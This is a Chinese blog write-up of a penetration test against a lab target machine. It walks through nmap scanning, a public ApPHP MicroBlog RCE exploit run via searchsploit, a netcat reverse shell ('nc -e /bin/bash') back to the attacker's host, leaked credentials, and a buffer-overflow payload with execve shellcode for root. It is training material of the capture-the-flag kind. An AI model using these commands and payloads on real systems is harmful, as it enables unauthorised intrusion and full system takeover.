记录一次渗透的过程
目录
一、信息收集
1.使用nmap扫描网段,发现存活主机,以及开放的端口
nmap -v 192.168.216.0/24
192.168.216.142
2.避免发现端口不全,使用nmap重新对该ip进行端口扫描
nmap -A -p- 192.168.216.142
3.信息收集
发现有http服务,当然要去访问一下的啦!
服务器为Debian,中间件为Apache 2.4.10
访问192.168.216.142:80发现是一个博客网站
对其进行目录扫描
没有发现可疑的文件
二、发现漏洞
发现底部有管理员登录,尝试使用默认账号密码登录后失败
1.使用sqlmap检测sql注入漏洞
经过sqlmap爆破之后,没有注入漏洞,因此只能换一种思路
2.查看了一下源代码,发现这是一个ApPHP MicroBlog版本为1.0.1
上kali 漏洞库查找这个漏洞
searchsploit ApPHP MicroBlog
还真的有记录这个漏洞,接下来进行exp验证,使用RCE漏洞
searchsploit -m php/webapps/33070.py #将exp拷贝到当前目录
python 33070.py http://192.168.216.142/index.php #exp利用
成功拿到webshell,但是当前的权限野只是低权限,后续需要进行提权。
可以看到getshell后exp还将数据库的配置文件也爆了出来,发现有一个用户的账号和密码,在/home目录下查看发现存在这个用户。于是切换到这个用户下进行后续渗透。
用户名:clapton
密码:yaraklitepe由于当前shell并不是交互式的,因此需要开一个反弹shell来进行切换用户
有nc,可以使用kali进行nc监听反弹shell
nc -lvnp 4444 #nc监听4444端口
nc -e /bin/bash 192.168.216.128 4444 #nc连接到4444端口
python -c 'import pty;pty.spawn("/bin/bash")' #使用python反弹shell
成功反弹shell,接下来切换到clapton用户
成功获取到第一个flag(F569AA95FAFF65E7A290AB9ED031E04F),而且有一个note.txt文件提示为缓冲区溢出就是解决方法,而且还给了2个网站教程。
https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.html
三、权限提升
由于本人的能力过于菜鸟,通过大佬所给出的提权脚本,将脚本上传到服务器执行
附上payload
for a in {1..1000}; do (./input $(python -c 'print "A" * 171 + "\x80\x26\x83\xbf" + "\x90" * 2000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80" ')); done
成功提权到root权限。
总结
靶机在前面并不是很难,但是在提权到root权限相对来说很麻烦,而且涉及了我不认识的知识点--缓冲区溢出,所以在提权到root时会比较耗费时间,只能在网上查找相应的博客进行学习和模仿。
searchsploit漏洞库的使用
nc的利用
缓存区溢出漏洞
780
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
